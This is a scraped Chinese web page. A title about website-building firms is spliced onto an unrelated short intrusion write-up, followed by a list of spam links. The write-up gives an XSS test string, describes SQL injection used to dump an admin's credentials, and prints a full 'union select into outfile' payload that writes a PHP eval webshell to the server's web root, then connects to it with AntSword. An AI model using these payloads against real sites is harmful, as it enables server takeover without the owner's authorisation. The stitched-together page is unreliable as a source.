当前位置: 首页 > news >正文

莱芜企业网站建设公司带后台的html网站源码

莱芜企业网站建设公司,带后台的html网站源码,做有趣的网站,wordpress无法1.xss漏洞 搜索框输入以下代码&#xff0c;验证是否存在xss漏洞 <script>alert(1)</script> OK了&#xff0c;存在xss漏洞 2.SQL注入 经过测试&#xff0c;输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密&#xff0c;解码内容如下 找…

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐

http://www.yayakq.cn/news/513285/

相关文章:

  • wordpress tint 2.7.0无锡seo网站排名优化
  • 三大门户网站哪家做的最好淄博网站建设 很乱
  • 建设银行网站打不开宣城市市政建设集团公司网站
  • 查询企业信息的官方网站做网站寄生虫需要哪些东西
  • 深圳营销网站建设wordpress即时通讯
  • wordpress获取文章内容过滤空格昆明seo关键字推广
  • 上海专业网站建设服务网站死链怎么办
  • 建立公司网站多少钱免费男女打扑克的软件
  • 网站备案帐号做app和做网站区别
  • 深圳做网站要多平台推广文案
  • 用户搭建网站英文字体设计网站
  • 大型网站开发 cwordpress 淘宝 采集
  • 国际销售网站有哪些网站开发工程师求职简历
  • 酒店建设网站的优势有哪些百度竞价广告推广
  • 合肥网站推广如何承接网站建设外包
  • 企业网站源码带手机版个人做网站名称可以随意更改吗
  • 青海网站开发 建设新手如何建站
  • 网站建设一二级目录mooc网站建设
  • 网站怎么做站群绍兴网站推广排名
  • 中国建设银行邀约提额网站中国欧洲陆运专线
  • 汽车销售网站google广告在wordpress
  • godaddy如何创建网站微信防红短链接生成
  • 在线教育网站建设投标书杭州排名优化公司
  • 网站的惩罚期要怎么做怎么查个人名下是否注册公司
  • 长春网站设计宁波网站搭建公司定制
  • 顺德网站建设合理使用颜色搭配_方能达到最佳视觉效果邢台精品网站建设
  • dede5.7 做的网站 下 加一个discuz论坛wordpress 注册 插件
  • 淘宝上网站建设是什么自己做行程的网站
  • 加盟网站需要怎么做六盘水网站开发
  • 北京商业设计网站做网站要买多少服务器空间